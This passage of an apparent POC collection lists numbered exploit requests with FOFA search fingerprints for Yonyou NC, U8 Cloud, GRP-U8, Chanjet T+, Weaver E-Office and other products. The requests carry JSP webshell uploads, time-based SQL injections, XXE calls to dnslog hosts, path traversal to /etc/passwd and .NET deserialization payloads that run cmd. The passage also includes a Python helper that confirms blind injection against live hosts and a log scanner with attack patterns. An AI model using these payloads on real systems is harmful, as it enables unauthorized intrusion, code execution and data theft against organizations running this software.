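    '10.0.0.5 - - [05/Jun/2024:14:31:29 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.6 - - [05/Jun/2024:14:31:30 +0800] "GET /static/..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 1827',
    '10.0.0.7 - - [05/Jun/2024:14:31:31 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 9031',
    '10.0.0.8 - - [05/Jun/2024:14:31:32 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 9031',
    '10.0.0.9 - - [05/Jun/2024:14:31:33 +0800] "GET /search/index.php?keyword=%2527%2520and%2520extractvalue%25281%252Cuser%2528%2529%2529%2523 HTTP/1.1" 500 0',
    '10.0.0.10 - - [05/Jun/2024:14:31:34 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1%27waitfor+delay+%270:0:5%27-- HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for path, tags in scan_access_log(SAMPLE_LOG):
        print(f"{path:40s} {', '.join(tags)}")
```

The two jshERP lines canonicalise to the same `/jshERP-boot/user/getAllList`, which is the point of normalising before matching: an allow/deny rule written against the raw URL would see two unrelated strings. The double-encoded 稻壳 payload only reveals `extractvalue(` after the second decode round, so a single-pass decoder would miss it; the `body` argument lets the same function inspect JSON bodies from a proxy or WAF log for the log4j and fastjson markers, which never appear in the URL.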
24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

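Most of the Yonyou entries that follow (linkVoucher, down/bill, importPml, runStateServlet, complainbilldetail, downTax/download, warningDetailInfo, and later the GRP-U8 and Chanjet T+ ones) are time-based blind injections: `waitfor delay '0:0:5'` for SQL Server or `DBMS_PIPE.RECEIVE_MESSAGE(...,5)` for Oracle. A single slow response proves nothing on an ERP that is slow anyway. The helper below is an added example, not code from the original post or from any vendor: it interleaves zero-delay and five-second variants of the same payload and reports the parameter as injectable only when every delayed request is slower than the slowest baseline by most of the requested sleep. The endpoint and parameter name are taken from entry 26 with a placeholder host; `SimulatedTarget` is a constructed stand-in so the logic runs offline.

```python
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple


def delay_payloads(db: str, seconds: int) -> Tuple[str, str]:
    """(baseline, delayed) values for the injectable parameter.

    The baseline keeps the same syntax with a zero sleep, so a timing
    difference comes from the sleep itself, not from the query breaking
    or a WAF block page being served faster than the real handler.
    """
    if db == "mssql":  # waitfor delay, as in the NC linkVoucher POC
        return ("1'waitfor delay '0:0:0'--",
                f"1'waitfor delay '0:0:{seconds}'--")
    if db == "oracle":  # DBMS_PIPE.RECEIVE_MESSAGE, as in the NC showcontent POC
        return ("1' AND 4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),0)--",
                f"1' AND 4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),{seconds})--")
    raise ValueError(f"unsupported backend: {db}")


def build_url(base: str, param: str, value: str, extra: Dict[str, str]) -> str:
    """Put the payload into `param`; the other query parameters are kept as given."""
    query = dict(extra)
    query[param] = value
    return f"{base}?{urllib.parse.urlencode(query)}"


def linkvoucher_url(value: str) -> str:
    """Entry 26's endpoint and parameter; the host is a placeholder (assumption)."""
    return build_url("http://your-ip/portal/pt/yercommon/linkVoucher",
                     "pkBill", value, {"pageId": "login"})


def timed_http_get(url: str, timeout: float = 30.0) -> float:
    """Real transport: seconds until the response (or an error) comes back."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass
    return time.monotonic() - start


def confirm_delay(timed_get: Callable[[str], float], url_for: Callable[[str], str],
                  db: str = "mssql", seconds: int = 5, trials: int = 3) -> bool:
    """True only if every delayed request is slower than the slowest baseline
    by at least 80% of the requested sleep. Baseline and delayed requests are
    interleaved so load on the target affects both series equally."""
    baseline, delayed = delay_payloads(db, seconds)
    base_times: List[float] = []
    delay_times: List[float] = []
    for _ in range(trials):
        base_times.append(timed_get(url_for(baseline)))
        delay_times.append(timed_get(url_for(delayed)))
    slowest_baseline = max(base_times)
    return all(t - slowest_baseline >= 0.8 * seconds for t in delay_times)


class SimulatedTarget:
    """Constructed stand-in for a target (no network). `latencies` is cycled
    through as the target's own response time; when `vulnerable`, the sleep
    requested by the payload is added on top, exactly as a real sleep would be."""

    def __init__(self, latencies: List[float], vulnerable: bool = True):
        self.latencies = latencies
        self.vulnerable = vulnerable
        self.calls = 0

    def __call__(self, url: str) -> float:
        own = self.latencies[self.calls % len(self.latencies)]
        self.calls += 1
        decoded = urllib.parse.unquote_plus(url)
        sleep = 0.0
        if self.vulnerable:
            if "waitfor delay '0:0:" in decoded:
                sleep = float(decoded.split("waitfor delay '0:0:")[1].split("'")[0])
            elif "RECEIVE_MESSAGE(CHR(65)," in decoded:
                sleep = float(decoded.split("RECEIVE_MESSAGE(CHR(65),")[1].split(")")[0])
        return own + sleep


if __name__ == "__main__":
    steady = SimulatedTarget([0.2, 0.3])
    jittery = SimulatedTarget([0.2, 6.0, 0.3], vulnerable=False)
    print("vulnerable, steady target :", confirm_delay(steady, linkvoucher_url))
    print("not vulnerable, jittery   :", confirm_delay(jittery, linkvoucher_url))
```

Against a live host pass `timed_http_get` instead of a `SimulatedTarget`. On a flaky network raise `seconds` and `trials` rather than lowering the 80 % margin; a target whose own latency swings by more than the sleep cannot be confirmed this way and needs an out-of-band check such as the DNSLog callbacks used elsewhere in this list.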
27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is written to:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo API SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reached through:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php API arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is written to a path of the form:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file read (the source lists it as a file upload, but the POC is a path traversal to /etc/passwd)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It runs a command that writes a chosen string into a chosen file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL to confirm the file was written:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

